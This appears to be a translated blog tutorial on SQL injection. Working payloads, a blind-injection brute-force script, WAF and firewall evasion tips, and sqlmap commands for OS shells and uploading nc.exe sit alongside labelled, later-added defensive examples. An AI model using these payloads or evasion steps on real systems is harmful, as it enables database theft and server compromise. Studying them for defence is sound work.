
Web vulnerability - SQL

2021-09-15 05:07:51 1_ Ry

Because my blog has so far only covered what I learned while doing penetration testing, with no notes on web vulnerabilities, and I have found that I am not really familiar with vulnerabilities at the web layer, I am writing notes to review them, starting with SQL injection.

Without further ado, first the cheat sheet written by the expert, [ctfhub]SQL Inject - h3zh1 - Blog Garden (cnblogs.com); the basic, commonly used manual injection commands are all there.

union select: the union query; union injection is the most commonly used form
database(): echoes the name of the currently connected database
version(): shows the current SQL server version, e.g. mysql 1.2.3, mariadb-4.5.6
group_concat(): joins the values of the generated group with commas into one string
information_schema: the database that stores a great deal of information about MySQL
information_schema.schemata: a table of the information_schema database, named schemata
schema_name: the column of the schemata table that stores the names of all MySQL databases
information_schema.tables: stores all MySQL tables
table_schema: the column of the tables table that stores the database name each table belongs to
table_name: the table name, in one-to-one correspondence with table_schema
information_schema.columns: the columns table stores the information of all columns
column_name: once a table name is known, all field (column) names of that table can be obtained through this column
table_name: the table name, in one-to-one correspondence with column_name
select updatexml(1,concat(0x7e,database(),0x7e),1);: note that only the content placed where database() sits is echoed back through the error message
right(str, num): take num characters from the right end of the string
left(str,num): likewise, take num characters from the left end of the string
substr(str,N,M): starting at the Nth character of the string, take M characters

 

SQL injection principle

An SQL injection vulnerability arises when the following two conditions are both met:

  • User-controlled parameter: the parameter passed from the front end to the back end can be controlled by the user.
  • Parameter taken into the database query: the incoming parameter is spliced into the SQL statement, and the statement is taken to the database for the query.

When the incoming id parameter is 1 and 1=1, the SQL statement executed is (the # symbol is the comment character):

select * from users where id=1 and 1=1#

Because 1=1 is true and id=1 in the where clause is also true, the page returns the same result as for id=1. When the incoming id parameter is 1 and 1=2, 1=2 does not hold, so the whole condition is false and the page returns a result different from id=1.

This short test gives a preliminary judgment of whether the parameter has an SQL injection vulnerability. If it is confirmed, an attacker can go on to splice further SQL into the statement, leak the database, and even obtain privileges on the server.
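To make the two conditions concrete, here is an added example that is not part of the original post: a small Python program against an in-memory SQLite table (the users table, its rows and the function names are constructed for this example) that splices the id parameter into the statement, runs the post's 1=1 / 1=2 test against it, and then shows the parameterised form in which the parameter can never be interpreted as SQL.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the post's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def query_vulnerable(conn, user_input):
    # Both preconditions hold: user_input is attacker-controlled and it is
    # spliced straight into the statement text, so it can extend the WHERE clause.
    sql = "SELECT id, username FROM users WHERE id=" + user_input
    return conn.execute(sql).fetchall()


def query_safe(conn, user_input):
    # Check the type the application expects, then bind the value as a
    # parameter: the driver hands it to the engine as data, never as SQL text.
    try:
        id_value = int(user_input)
    except ValueError:
        raise ValueError("id must be an integer") from None
    return conn.execute("SELECT id, username FROM users WHERE id=?", (id_value,)).fetchall()


def responds_to_tautology(query, conn, param):
    """The post's test: do `and 1=1` and `and 1=2` produce different results?"""
    return query(conn, param + " and 1=1") != query(conn, param + " and 1=2")


def demo():
    conn = make_db()
    out = {
        "vuln_true": query_vulnerable(conn, "1 and 1=1"),   # same rows as id=1
        "vuln_false": query_vulnerable(conn, "1 and 1=2"),  # no rows at all
        "vuln_differs": responds_to_tautology(query_vulnerable, conn, "1"),
        "safe_plain": query_safe(conn, "1"),
    }
    try:
        query_safe(conn, "1 and 1=1")
        out["safe_rejected"] = False
    except ValueError:
        out["safe_rejected"] = True
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The vulnerable function answers the two probes differently, which is exactly the signal the post describes; the safe function never lets the probe reach the database, because the value is validated as an integer and then bound rather than concatenated.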

  

Union injection attack

After finding the injection point, use order by to determine the number of fields (columns) returned by the query.

For example, entering this echoes the same result as id=1:

id=1 order by 4#

but order by 5 echoes a different result, so the number of fields is 4.

After determining the number of fields, use union injection to find the positions of the echoed fields.

When using union, note that the injected parameter is set to -1; otherwise the database first finds the row for the original parameter value, and the echo positions cannot be determined.

id=-1 union select 1,2,3,4#

Then put the attack code into an echoed field. For example, if 2 is the echoed field, replacing it with database() shows the database name:

id=-1 union select 1,database(),3,4#

Suppose the database name turns out to be sqli. Knowing the database name, query the table names; group_concat joins the values of a group with commas into one string:

id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema="sqli"#

Suppose the table name turns out to be flag; query the field names:

id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name="flag"#

Knowing the field name, read the field:

id=-1 union select 1,group_concat(flag),3,4 from sqli.flag#

This is the basic idea of union injection, but in practice there are many filters in the way to prevent attackers from obtaining database information.

  

Error-based injection attack

Error-based injection can be used after the injection point has been found but there is no echoed field; it only works when the page displays the error message.

The key command is select updatexml(1,concat(0x7e,database(),0x7e),1); the part at database() is replaced with the statement you want to run.

0x7e is the ASCII code for ~; it is used to separate the key information from the system's error text.

The rest of the approach is the same as union injection, but note that the right and left functions are needed to read the fields echoed through the error, because the number of characters the error echoes is usually limited while the database information needed is relatively long.

right(str, num): take num characters from the right end of the string
left(str,num): likewise, take num characters from the left end of the string

Usage example:

-1 union select updatexml(1,concat(0x7e,right((select group_concat(schema_name) from information_schema.schemata),31),0x7e),1)#

  

Boolean injection attack

When the page only shows yes or no and never returns any data from the database, Boolean injection is used.

First use the length() function to determine the length of the database name:

id=1 and length(database())>=1#

After finding the length of the database name, use the substr function to get the database name one character at a time. Database names generally stay within the range a~z and 0~9, and there may also be some special characters.

substr(str,N,M): starting at the Nth character of the string, take M characters

id=1 and substr(database(),1,1)='a'#

But doing this by hand is slow and inefficient; brute forcing is generally used instead, for example with Burp Suite (bp), judging whether a guess is correct from the byte length of the response.

Once the database name has been brute-forced, the following steps are the same as before.

 

Time-based injection attack

Time-based injection is almost the same as Boolean injection; the difference is that time-based injection is used when the page returns nothing at all, not even a difference when the condition is correct.

Time-based injection uses the sleep function to make MySQL's execution time longer, and judges whether the injection succeeded from the delay.

The statement to judge the length of the database name is:

id=if(length(database())>1,sleep(5),1)

This means: if the length of the database name is greater than 1, pause for five seconds and then execute; otherwise execute immediately.

Once time-based blind injection is understood, the attack follows the same idea as before:

id=if(substr(database(),1,1)='a',sleep(5),1)

But manual time-based blind injection is even slower than Boolean injection, so a Python script is usually used for the brute force.

Here is the code:

import requests
import time

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
}
word1 = []
word2 = []
# url = input("url:")
# t = input("sleep:")

# candidate character sets: upper case, lower case, digits and braces
for i in range(65, 91):
    word1.append(chr(i))
for i in range(97, 123):
    word1.append(chr(i))
for i in range(48, 58):
    word1.append(chr(i))
word1.append('{')
word1.append('}')
for i in range(97, 123):
    word2.append(chr(i))
for i in range(48, 58):
    word2.append(chr(i))
word2.append('{')
word2.append('}')

# position by position, a guess is correct when the response is delayed by sleep(3)
for i in range(1, 40):
    for j in word2:
        url = "http://URL/?id=1 and if(substr((select flag from sqli.flag)," + str(i) + ",1)='" + str(j) + "',sleep(3),1)#"
        t1 = time.time()
        r = requests.get(url, headers=headers)  # send the GET request; returns a Response object
        t2 = time.time()
        if t2 - t1 > 3:
            print(j)

 

Stacked injection attack

Stacked queries execute multiple statements separated by semicolons. The difference between stacked injection and union injection is that stacked injection can execute any statement, while union injection is limited to query statements.

For example, data can be inserted into or deleted from the database:

id=1;insert into user(id,username,password)values('5','zhangsan','123456');#

  

Second-order injection attack

In second-order injection the attacker stores the attack code in the database through registration or some other route; when the application later uses this stored value in another query, the attack takes effect.

For example, the database already has an admin account whose password is unknown. We register an account named admin'# so that the quote is closed, then change that account's password; the application's original statement is

update user set password='new password' where username='admin'#' and password='password'

Because # follows admin, the rest of the statement is not executed, so the database changes admin's password to the one we just set.
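Added example, not from the original post, of the same second-order flow in Python with SQLite (the user table, its rows and the function names are constructed for this example; SQLite comments use -- where MySQL uses #). Registration binds its parameters and stores admin'-- literally, the password change that trusts the stored name is where the injection fires, and the fix is to bind every value in every query, including values that came out of the database.

```python
import sqlite3


def make_db():
    """Constructed table with an existing admin account whose password is unknown."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (username TEXT, password TEXT)")
    conn.execute("INSERT INTO user VALUES (?, ?)", ("admin", "secret"))
    return conn


def register(conn, username, password):
    # Parameterised: the quote and the comment marker are stored as plain data.
    conn.execute("INSERT INTO user VALUES (?, ?)", (username, password))


def change_password_vulnerable(conn, username, new_password):
    # The username is read back from the database and treated as trusted,
    # then spliced into a new statement: admin'-- closes the quote and the
    # rest of the WHERE clause becomes a comment, so the admin row is updated.
    stored = conn.execute("SELECT username FROM user WHERE username=?", (username,)).fetchone()[0]
    sql = "UPDATE user SET password='" + new_password + "' WHERE username='" + stored + "'"
    conn.execute(sql)


def change_password_safe(conn, username, new_password):
    stored = conn.execute("SELECT username FROM user WHERE username=?", (username,)).fetchone()[0]
    # Bind every value in every query; data that came out of the database is still data.
    conn.execute("UPDATE user SET password=? WHERE username=?", (new_password, stored))


def admin_password(conn):
    return conn.execute("SELECT password FROM user WHERE username='admin'").fetchone()[0]


def demo(change_password):
    """Register the crafted name, change its password, report admin's password."""
    conn = make_db()
    register(conn, "admin'--", "anything")
    change_password(conn, "admin'--", "attacker-chosen")
    return admin_password(conn)


if __name__ == "__main__":
    print("vulnerable:", demo(change_password_vulnerable))  # admin's password replaced
    print("safe:      ", demo(change_password_safe))        # admin's password untouched
```

The lesson is that escaping or binding at the point of input is not enough on its own; the second query has to bind too, because the stored name is no more trustworthy than the request it came from.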

  

Wide-byte injection attack

Wide-byte injection is used when the closing quote is escaped with a backslash '\'; normally that means there is no SQL injection. The exception is when the database character set is GBK.

The encoding of '\' is %5c, and in GBK %df%5c is a traditional Chinese character, so putting %df in front of the escaped character makes the backslash part of a two-byte character and the escape disappears.
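Added example, not from the original post, showing the encoding mechanism in Python: the byte sequence %df followed by a quote (constructed), escaped at the byte level the way addslashes does and then decoded as GBK versus UTF-8, together with the mitigation of escaping after decoding in the connection's character set. The helper names are my own.

```python
PAYLOAD = bytes.fromhex("df27")  # constructed: the bytes of %df followed by '


def escape_bytes(raw: bytes) -> bytes:
    """Byte-level quote escaping: puts 0x5c (backslash) before each single quote."""
    return raw.replace(b"'", b"\\'")


def seen_by_database(raw: bytes, charset: str) -> str:
    """What the escaped bytes become once decoded in the connection charset."""
    return escape_bytes(raw).decode(charset, errors="replace")


def has_unescaped_quote(text: str) -> bool:
    """True when a single quote appears that is not preceded by a backslash."""
    i = text.find("'")
    return i >= 0 and (i == 0 or text[i - 1] != "\\")


def escape_after_decode(raw: bytes, charset: str) -> str:
    """Mitigation: decode first, then escape characters, so no lead byte can
    swallow the backslash. (Parameterised queries avoid the issue entirely.)"""
    return raw.decode(charset, errors="replace").replace("'", "\\'")


if __name__ == "__main__":
    for cs in ("utf-8", "gbk"):
        text = seen_by_database(PAYLOAD, cs)
        print(cs, repr(text), "unescaped quote:", has_unescaped_quote(text))
    print("escape after decode (gbk):", repr(escape_after_decode(PAYLOAD, "gbk")))
```

Under UTF-8 the stray 0xdf byte is replaced and the backslash stays in front of the quote; under GBK the decoder consumes 0xdf 0x5c as one character and the quote is left bare, which is the whole trick. Escaping on decoded text, or better, binding the value as a parameter, closes it regardless of character set.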

 

XFF injection attack

Capturing the request with BurpSuite, you can see a header parameter X-Forwarded-For in the HTTP request headers. X-Forwarded-For, abbreviated XFF, represents the real IP of the client. Modifying the value of X-Forwarded-For forges the IP: set X-Forwarded-For to 127.0.0.1 and visit the URL, and the page returns normally.

Then complete the injection with the union injection method:

X-forwarded-for: 127.0.0.1' union select 1,2,3,4#
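Added example, not from the original post, of handling this header on the application side in Python: the header is client-controlled, so its value is parsed as a chain of IP addresses with the standard ipaddress module, and anything else is discarded and flagged before it can reach a query or a log line. The assumption that the right-most hop was appended by a single trusted reverse proxy, and the function names, are mine; binding the query parameter remains the actual fix for the injection.

```python
import ipaddress


def parse_xff(header_value):
    """Validate X-Forwarded-For as a comma-separated chain of IP addresses.
    Returns the list of ipaddress objects, or raises ValueError on anything else."""
    if not header_value or not header_value.strip():
        raise ValueError("empty X-Forwarded-For")
    return [ipaddress.ip_address(part.strip()) for part in header_value.split(",")]


def resolve_client(header_value, socket_ip):
    """Decide which address the application may use and whether the header
    looked tampered with. Assumption: exactly one trusted reverse proxy sits in
    front of the app and appends the peer address, so the right-most hop is the
    one it wrote; a value that is not an IP address is ignored and flagged."""
    try:
        chain = parse_xff(header_value)
    except ValueError:
        return {"client_ip": socket_ip, "suspicious": header_value not in (None, "")}
    return {"client_ip": str(chain[-1]), "suspicious": False}


if __name__ == "__main__":
    # Constructed header values; 203.0.113.9 stands in for the TCP peer address.
    for value in ("127.0.0.1", "198.51.100.7, 10.0.0.2", "127.0.0.1' union select 1,2,3,4#", None):
        print(repr(value), "->", resolve_client(value, "203.0.113.9"))
```

A value that fails to parse is the detection signal here: the header is only ever set by proxies, so anything that is not an address list is worth alerting on, and it never gets near the query.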

  

SQL injection bypass techniques

There are too many bypass methods, and each applies to different scenarios, so they are not discussed in detail here; the common ones are listed:

  1. Case bypass: commonly used against keyword filtering; MySQL statements are not case-sensitive, so mixed case can be used to get past the filter
  2. Double-writing bypass: commonly used against keyword filtering that removes the keyword; for example, if and is filtered, write anandd
  3. Encoding bypass: commonly used against keyword filtering; URL-encode the filtered keyword twice, because the server automatically decodes it once
  4. Space bypass: when spaces are filtered, use /**/ in place of spaces
  5. Inline comment bypass: commonly used against keyword filtering; wrap the keyword in /*! and */, e.g. /*!and*/

Multiple bypass methods can be combined in manual injection, which raises the probability of success.
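Added example, not from the original post, of a detector that canonicalises a request parameter before matching, so that the five bypasses listed here no longer hide the union, information_schema, updatexml and sleep patterns from the earlier sections. The sample values, the access-log lines and the function names are constructed; naive_filter models the delete-once blocklist that double-writing defeats.

```python
import re
import urllib.parse

# Patterns for the techniques described earlier in the post, applied only to
# the canonicalised value.
SIGNATURES = [
    r"\bunion\s+(?:all\s+)?select\b",   # union injection
    r"\binformation_schema\b",          # schema enumeration
    r"\bupdatexml\s*\(",                # error-based injection
    r"\bsleep\s*\(",                    # time-based injection
    r"\band\s+\d+\s*=\s*\d+",           # boolean tautology probe
]


def normalise(value: str) -> str:
    """Undo the listed bypasses so the detector sees what the database sees."""
    # 3. encoding bypass: the server decodes once, so the filter decodes twice.
    for _ in range(2):
        value = urllib.parse.unquote_plus(value)
    # 5. inline comment bypass: MySQL executes the body of /*! ... */, so keep it.
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)
    # 4. space bypass: an ordinary comment acts as whitespace.
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    # 1. case bypass: keywords are case-insensitive.
    value = value.lower()
    return re.sub(r"\s+", " ", value).strip()


def detect(value: str):
    """Return the signatures matched by the normalised value (empty if none)."""
    norm = normalise(value)
    return [sig for sig in SIGNATURES if re.search(sig, norm)]


def naive_filter(value: str) -> str:
    """2. double-writing works because filters like this one delete a keyword
    once and forward the rest: 'anandd' becomes 'and'. Never sanitise by
    deletion; reject the request or bind the value as a parameter."""
    return re.sub(r"and", "", value, count=1, flags=re.I)


def scan_access_log(lines):
    """Apply detect() to every query-string parameter of the GET requests."""
    hits = []
    for line in lines:
        m = re.search(r'"GET\s+(\S+)\s', line)
        if not m:
            continue
        query = urllib.parse.urlsplit(m.group(1)).query
        for key, val in urllib.parse.parse_qsl(query, keep_blank_values=True):
            matched = detect(val)
            if matched:
                hits.append((key, matched))
    return hits


# Constructed samples, one per bypass technique listed in the post.
SAMPLES = {
    "case": "-1 UnIoN SeLeCt 1,database(),3,4",
    "double_write": "1 anandd 1=1",
    "double_encoded": "-1%2520union%2520select%25201%252C2",
    "comment_space": "-1/**/union/**/select/**/1,2,3,4",
    "inline_comment": "-1 /*!union*/ /*!50000select*/ 1,2",
}

# Constructed access-log lines in common log format.
LOG_LINES = [
    '10.0.0.5 - - [15/Sep/2021:05:07:51 +0000] "GET /?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [15/Sep/2021:05:08:02 +0000] "GET /?id=-1%20/*!union*/%20/*!select*/%201,database(),3,4%23 HTTP/1.1" 200 611',
]


if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(name, "->", normalise(value), detect(value))
    print("after naive filter:", detect(naive_filter(SAMPLES["double_write"])))
    print("log hits:", scan_access_log(LOG_LINES))
```

Two points worth noting: the double-written sample is harmless on its own and only becomes a tautology after the delete-once filter has run, so detection has to look at the value the database will actually receive; and the log scanner decodes exactly as the web server does, then normalises again, which is why the inline-comment payload in the second log line is still caught.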

 

Introduction to the automated tool sqlmap

sqlmap is an automated tool for SQL injection vulnerabilities.

sqlmap -h: view the help


sqlmap basics

GET parameters

Read the current user and current database:

sqlmap -u http://URL/?id=1 --current-user --current-db

Detect whether there is an injection point:

sqlmap -u http://URL/?id=1

Get the database names:

sqlmap -u http://URL/?id=1 --dbs

Suppose the database name sqli is obtained; get the table names:

sqlmap -u http://URL/?id=1 -D sqli --tables

Suppose the table name user is obtained; get the column names:

sqlmap -u http://URL/?id=1 -D sqli -T user --columns

Suppose the column names user and password are obtained; dump the fields:

sqlmap -u http://URL/?id=1 -D sqli -T user -C user,password --dump

POST parameters

When the data is submitted by POST, capture the request with Burp Suite and save it as a text file test.txt (if test.txt is not placed in the sqlmap directory, use its absolute path).

sqlmap -r test.txt -p id // -r reads the request from the file, -p names the parameter to inject.

The rest is the same as for GET.

 

sqlmap advanced

Here we mainly talk about how to get past a WAF.

  • --level=5: detection level, 1-5, default 1. The higher the level, the more payloads and the slower the scan. The HTTP Cookie is tested from level 2, and HTTP User-Agent/Referer from level 3.
  • --risk=RISK: risk of the tests performed (0-3, default 1)
  • --threads: use multiple threads (--threads 3)
  • --referer="http://www.google.com": simulate the referring page, i.e. which page the request was jumped from. If unclear, look up Referer.
  • --cookie=COOKIE: set the cookie of the HTTP request; at level 2 sqlmap tries to inject into the cookie, e.g. "PHPSESSID=aaaa"
  • --user-agent: modify the User-Agent of the HTTP request, usually set to a search-engine UA to look like a search engine and avoid an IP ban; --random-agent can also be used, which picks randomly from user-agent.txt (level 3 tries User-Agent injection)
  • --proxy=PROXY: connect to the target URL through a proxy server
  • --delay=time: delay between requests, in seconds, to avoid attracting the firewall's attention

Of course the simplest and crudest way is a proxy pool: buy proxies online (there are free ones, but they are not reliable), set --proxy=proxy ip and change the IP on every request, so the firewall does not notice.


sqlmap advanced options

  • --is-dba: whether the current user has DBA privileges
  • --roles: list the database administrator roles; only applies when the current database is Oracle
  • --referer=https://www.baid.com: sqlmap can forge the Referer in the HTTP request; when --level is set to 3 or above it tries Referer injection
  • --sql-shell: run custom SQL statements
  • --os-cmd, --os-shell: run arbitrary operating system commands
  • --file-read "C:/example.exe": read a file from the database server
  • sqlmap.py -u URL --file-write "/software/nc.exe" --file-dest "C:/WINDOWS/Temp/nc.exe": upload a file to the database server


Copyright notice
This article was written by [1_ Ry]; please include the original link when reposting, thank you
https://chowdera.com/2021/09/20210909115108164v.html
